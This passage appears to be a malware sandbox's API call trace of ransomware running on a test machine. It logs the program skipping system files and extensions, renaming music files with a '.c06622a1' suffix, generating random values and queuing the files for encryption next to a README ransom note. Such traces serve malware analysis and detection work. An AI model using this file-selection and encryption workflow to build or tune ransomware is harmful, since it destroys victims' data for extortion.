(_String="nls") returned 0x3 [0160.628] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0160.628] wcslen (_String="nomedia") returned 0x7 [0160.628] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0160.628] wcslen (_String="ocx") returned 0x3 [0160.628] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0160.628] wcslen (_String="prf") returned 0x3 [0160.628] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0160.628] wcslen (_String="ps1") returned 0x3 [0160.628] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0160.628] wcslen (_String="rom") returned 0x3 [0160.628] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0160.628] wcslen (_String="rtp") returned 0x3 [0160.628] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0160.628] wcslen (_String="scr") returned 0x3 [0160.628] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0160.628] wcslen (_String="shs") returned 0x3 [0160.628] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0160.628] wcslen (_String="spl") returned 0x3 [0160.628] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0160.628] wcslen (_String="sys") returned 0x3 [0160.628] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0160.628] wcslen (_String="theme") returned 0x5 [0160.628] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0160.628] wcslen (_String="themepack") returned 0x9 [0160.628] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0160.628] wcslen (_String="wpx") returned 0x3 [0160.628] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0160.628] wcslen (_String="lock") returned 0x4 [0160.628] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0160.628] wcslen (_String="key") returned 0x3 [0160.628] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0160.628] wcslen (_String="hta") returned 0x3 [0160.629] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0160.629] wcslen (_String="msi") returned 0x3 [0160.629] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0160.629] wcslen (_String="pdb") returned 0x3 [0160.629] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0160.629] wcslen (_String="sqlite") returned 0x6 [0160.629] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral")) returned 0x10 [0160.629] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.629] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" [0160.629] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl") returned 0x34 [0160.629] wcscpy (in: _Dest=0x32720e2, _Source="h6M xRQmnZv.m4a" | out: _Dest="h6M xRQmnZv.m4a") returned="h6M xRQmnZv.m4a" [0160.629] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\h6M xRQmnZv.m4a", dwFileAttributes=0x80) returned 1 [0160.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\h6M xRQmnZv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\h6m xrqmnzv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0160.629] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.629] ReadFile (in: hFile=0x194, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.630] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xbc46e081 [0160.630] RtlComputeCrc32 (PartialCrc=0xe081, Buffer=0x32e724, Length=0x80) returned 0xd01c2fb2 [0160.630] RtlComputeCrc32 (PartialCrc=0x2fb2, Buffer=0x32e724, Length=0x80) returned 0x9ca43437 [0160.630] RtlComputeCrc32 (PartialCrc=0x3437, Buffer=0x32e724, Length=0x80) returned 0xc079addb [0160.630] RtlComputeCrc32 (PartialCrc=0xaddb, Buffer=0x32e724, Length=0x80) returned 0x5207fbfc [0160.630] CloseHandle (hObject=0x194) returned 1 [0160.630] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.630] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\h6M xRQmnZv.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\h6M xRQmnZv.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\h6M xRQmnZv.m4a" [0160.630] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\h6M xRQmnZv.m4a") returned 0x44 [0160.630] wcscpy (in: _Dest=0x3282108, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.630] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\h6M xRQmnZv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\h6m xrqmnzv.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\h6M xRQmnZv.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\h6m xrqmnzv.m4a.c06622a1"), dwFlags=0x8) returned 1 [0160.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\h6M xRQmnZv.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\h6m xrqmnzv.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0160.633] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.633] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0160.639] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5239e4f9 [0160.639] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x28cf4868 [0160.639] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x365193a2 [0160.639] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3d8ea2fe [0160.639] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x76e7adcc [0160.639] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d37fb58 [0160.639] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x28ccf65d [0160.639] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x37ede636 [0160.642] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0xda9ff13c [0160.643] RtlComputeCrc32 (PartialCrc=0xf13c, Buffer=0x3480094, Length=0x80) returned 0xb2a04ea4 [0160.643] RtlComputeCrc32 (PartialCrc=0x4ea4, Buffer=0x3480094, Length=0x80) returned 0x6dfacad1 [0160.643] RtlComputeCrc32 (PartialCrc=0xcad1, Buffer=0x3480094, Length=0x80) returned 0x23d91216 [0160.643] RtlComputeCrc32 (PartialCrc=0x1216, Buffer=0x3480094, Length=0x80) returned 0xb2a5e610 [0160.643] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0160.643] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.644] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.645] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d6aad20, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8d6aad20, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d6aad20, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0160.645] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0160.645] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cd0f10, ftCreationTime.dwHighDateTime=0x1d5df77, ftLastAccessTime.dwLowDateTime=0x61582650, ftLastAccessTime.dwHighDateTime=0x1d5e30b, ftLastWriteTime.dwLowDateTime=0x61582650, ftLastWriteTime.dwHighDateTime=0x1d5e30b, nFileSizeHigh=0x0, nFileSizeLow=0x7caa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z0tARC13B7tiCY3mTvvI.wav", cAlternateFileName="Z0TARC~1.WAV")) returned 1 [0160.645] _wcsicmp (_Str1="Z0tARC13B7tiCY3mTvvI.wav", _Str2="README.c06622a1.TXT") returned 8 [0160.645] wcsstr (_Str="Z0tARC13B7tiCY3mTvvI.wav", _SubStr="README") returned 0x0 [0160.645] _wcsicmp (_Str1="autorun.inf", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -25 [0160.645] wcslen (_String="autorun.inf") returned 0xb [0160.645] _wcsicmp (_Str1="boot.ini", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -24 [0160.645] wcslen (_String="boot.ini") returned 0x8 [0160.645] _wcsicmp (_Str1="bootfont.bin", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -24 [0160.645] wcslen (_String="bootfont.bin") returned 0xc [0160.645] _wcsicmp (_Str1="bootsect.bak", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -24 [0160.645] wcslen (_String="bootsect.bak") returned 0xc [0160.645] _wcsicmp (_Str1="desktop.ini", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -22 [0160.645] wcslen (_String="desktop.ini") returned 0xb [0160.645] _wcsicmp (_Str1="iconcache.db", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -17 [0160.645] wcslen (_String="iconcache.db") returned 0xc [0160.645] _wcsicmp (_Str1="ntldr", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -12 [0160.645] wcslen (_String="ntldr") returned 0x5 [0160.645] _wcsicmp (_Str1="ntuser.dat", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -12 [0160.645] wcslen (_String="ntuser.dat") returned 0xa [0160.645] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -12 [0160.645] wcslen (_String="ntuser.dat.log") returned 0xe [0160.645] _wcsicmp (_Str1="ntuser.ini", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -12 [0160.645] wcslen (_String="ntuser.ini") returned 0xa [0160.645] _wcsicmp (_Str1="thumbs.db", _Str2="Z0tARC13B7tiCY3mTvvI.wav") returned -6 [0160.645] wcslen (_String="thumbs.db") returned 0x9 [0160.645] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0160.646] wcslen (_String="386") returned 0x3 [0160.646] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0160.646] wcslen (_String="adv") returned 0x3 [0160.646] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0160.646] wcslen (_String="ani") returned 0x3 [0160.646] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0160.646] wcslen (_String="bat") returned 0x3 [0160.646] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0160.646] wcslen (_String="bin") returned 0x3 [0160.646] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0160.646] wcslen (_String="cab") returned 0x3 [0160.646] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0160.646] wcslen (_String="cmd") returned 0x3 [0160.646] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0160.646] wcslen (_String="com") returned 0x3 [0160.646] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0160.646] wcslen (_String="cpl") returned 0x3 [0160.646] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0160.646] wcslen (_String="cur") returned 0x3 [0160.646] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0160.646] wcslen (_String="deskthemepack") returned 0xd [0160.646] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0160.646] wcslen (_String="diagcab") returned 0x7 [0160.646] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0160.646] wcslen (_String="diagcfg") returned 0x7 [0160.646] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0160.646] wcslen (_String="diagpkg") returned 0x7 [0160.646] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0160.646] wcslen (_String="dll") returned 0x3 [0160.646] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0160.646] wcslen (_String="drv") returned 0x3 [0160.646] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0160.646] wcslen (_String="exe") returned 0x3 [0160.646] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0160.646] wcslen (_String="hlp") returned 0x3 [0160.646] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0160.646] wcslen (_String="icl") returned 0x3 [0160.647] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0160.647] wcslen (_String="icns") returned 0x4 [0160.647] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0160.647] wcslen (_String="ico") returned 0x3 [0160.647] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0160.647] wcslen (_String="ics") returned 0x3 [0160.647] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0160.647] wcslen (_String="idx") returned 0x3 [0160.647] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0160.647] wcslen (_String="ldf") returned 0x3 [0160.647] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0160.647] wcslen (_String="lnk") returned 0x3 [0160.647] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0160.647] wcslen (_String="mod") returned 0x3 [0160.647] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0160.647] wcslen (_String="mpa") returned 0x3 [0160.647] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0160.647] wcslen (_String="msc") returned 0x3 [0160.647] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0160.647] wcslen (_String="msp") returned 0x3 [0160.647] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0160.647] wcslen (_String="msstyles") returned 0x8 [0160.647] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0160.647] wcslen (_String="msu") returned 0x3 [0160.647] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0160.647] wcslen (_String="nls") returned 0x3 [0160.647] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0160.647] wcslen (_String="nomedia") returned 0x7 [0160.647] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0160.647] wcslen (_String="ocx") returned 0x3 [0160.647] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0160.647] wcslen (_String="prf") returned 0x3 [0160.647] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0160.647] wcslen (_String="ps1") returned 0x3 [0160.647] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0160.647] wcslen (_String="rom") returned 0x3 [0160.647] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0160.647] wcslen (_String="rtp") returned 0x3 [0160.648] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0160.648] wcslen (_String="scr") returned 0x3 [0160.648] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0160.648] wcslen (_String="shs") returned 0x3 [0160.648] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0160.648] wcslen (_String="spl") returned 0x3 [0160.648] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0160.648] wcslen (_String="sys") returned 0x3 [0160.648] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0160.648] wcslen (_String="theme") returned 0x5 [0160.648] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0160.648] wcslen (_String="themepack") returned 0x9 [0160.648] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0160.648] wcslen (_String="wpx") returned 0x3 [0160.648] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0160.648] wcslen (_String="lock") returned 0x4 [0160.648] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0160.648] wcslen (_String="key") returned 0x3 [0160.648] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0160.648] wcslen (_String="hta") returned 0x3 [0160.648] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0160.648] wcslen (_String="msi") returned 0x3 [0160.648] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0160.648] wcslen (_String="pdb") returned 0x3 [0160.648] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0160.648] wcslen (_String="sqlite") returned 0x6 [0160.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral")) returned 0x10 [0160.648] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.648] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl" [0160.648] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl") returned 0x34 [0160.648] wcscpy (in: _Dest=0x32720e2, _Source="Z0tARC13B7tiCY3mTvvI.wav" | out: _Dest="Z0tARC13B7tiCY3mTvvI.wav") returned="Z0tARC13B7tiCY3mTvvI.wav" [0160.648] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\Z0tARC13B7tiCY3mTvvI.wav", dwFileAttributes=0x80) returned 1 [0160.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\Z0tARC13B7tiCY3mTvvI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\z0tarc13b7ticy3mtvvi.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0160.649] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.649] ReadFile (in: hFile=0x1ec, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.650] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0x6ef43ed7 [0160.650] RtlComputeCrc32 (PartialCrc=0x3ed7, Buffer=0x32e724, Length=0x80) returned 0x39aece72 [0160.650] RtlComputeCrc32 (PartialCrc=0xce72, Buffer=0x32e724, Length=0x80) returned 0x6b33d544 [0160.650] RtlComputeCrc32 (PartialCrc=0xd544, Buffer=0x32e724, Length=0x80) returned 0x554c6b93 [0160.650] RtlComputeCrc32 (PartialCrc=0x6b93, Buffer=0x32e724, Length=0x80) returned 0x7c2bb50 [0160.650] CloseHandle (hObject=0x1ec) returned 1 [0160.650] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.650] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\Z0tARC13B7tiCY3mTvvI.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\Z0tARC13B7tiCY3mTvvI.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\Z0tARC13B7tiCY3mTvvI.wav" [0160.650] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\Z0tARC13B7tiCY3mTvvI.wav") returned 0x4d [0160.650] wcscpy (in: _Dest=0x328211a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.650] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\Z0tARC13B7tiCY3mTvvI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\z0tarc13b7ticy3mtvvi.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\Z0tARC13B7tiCY3mTvvI.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\z0tarc13b7ticy3mtvvi.wav.c06622a1"), dwFlags=0x8) returned 1 [0160.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\WvRAl\\Z0tARC13B7tiCY3mTvvI.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\wvral\\z0tarc13b7ticy3mtvvi.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ec [0160.653] CreateIoCompletionPort (FileHandle=0x1ec, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.653] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0160.659] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7964e81b [0160.659] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x19d90885 [0160.659] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x580af592 [0160.660] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x14e5398f [0160.660] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77c47c0c [0160.660] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3e7f1ee [0160.660] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2fa3a442 [0160.660] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2a031667 [0160.663] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x927d682b [0160.663] RtlComputeCrc32 (PartialCrc=0x682b, Buffer=0x3510094, Length=0x80) returned 0x5761018a [0160.663] RtlComputeCrc32 (PartialCrc=0x18a, Buffer=0x3510094, Length=0x80) returned 0xbda41736 [0160.663] RtlComputeCrc32 (PartialCrc=0x1736, Buffer=0x3510094, Length=0x80) returned 0x1c2b124c [0160.663] RtlComputeCrc32 (PartialCrc=0x124c, Buffer=0x3510094, Length=0x80) returned 0x278766b6 [0160.663] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0160.663] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.664] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.665] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0160.665] FindClose (in: hFindFile=0x1541c8 | out: hFindFile=0x1541c8) returned 1 [0160.665] _wcsicmp (_Str1="backup", _Str2="WvRAl") returned -21 [0160.665] wcslen (_String="backup") returned 0x6 [0160.665] _wcsicmp (_Str1="bak", _Str2="WvRAl") returned -21 [0160.665] wcslen (_String="bak") returned 0x3 [0160.665] _wcsicmp (_Str1="back", _Str2="WvRAl") returned -21 [0160.665] wcslen (_String="back") returned 0x4 [0160.665] _wcsicmp (_Str1="archive", _Str2="WvRAl") returned -22 [0160.665] wcslen (_String="archive") returned 0x7 [0160.665] _wcsicmp (_Str1="bckp", _Str2="WvRAl") returned -21 [0160.665] wcslen (_String="bckp") returned 0x4 [0160.665] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0160.667] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0160.667] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecff7560, ftCreationTime.dwHighDateTime=0x1d5e47c, ftLastAccessTime.dwLowDateTime=0x4892b730, ftLastAccessTime.dwHighDateTime=0x1d5e6ed, ftLastWriteTime.dwLowDateTime=0x4892b730, ftLastWriteTime.dwHighDateTime=0x1d5e6ed, nFileSizeHigh=0x0, nFileSizeLow=0xb847, dwReserved0=0x0, dwReserved1=0x0, cFileName="yBPZah0nIIj3ymKj190.mp3", cAlternateFileName="YBPZAH~1.MP3")) returned 1 [0160.667] _wcsicmp (_Str1="yBPZah0nIIj3ymKj190.mp3", _Str2="README.c06622a1.TXT") returned 7 [0160.667] wcsstr (_Str="yBPZah0nIIj3ymKj190.mp3", _SubStr="README") returned 0x0 [0160.667] _wcsicmp (_Str1="autorun.inf", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -24 [0160.667] wcslen (_String="autorun.inf") returned 0xb [0160.667] _wcsicmp (_Str1="boot.ini", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -23 [0160.667] wcslen (_String="boot.ini") returned 0x8 [0160.667] _wcsicmp (_Str1="bootfont.bin", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -23 [0160.667] wcslen (_String="bootfont.bin") returned 0xc [0160.667] _wcsicmp (_Str1="bootsect.bak", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -23 [0160.667] wcslen (_String="bootsect.bak") returned 0xc [0160.668] _wcsicmp (_Str1="desktop.ini", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -21 [0160.668] wcslen (_String="desktop.ini") returned 0xb [0160.668] _wcsicmp (_Str1="iconcache.db", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -16 [0160.668] wcslen (_String="iconcache.db") returned 0xc [0160.668] _wcsicmp (_Str1="ntldr", _Str2="yBPZah0nIIj3ymKj190.mp3") returned -11 [0160.668] 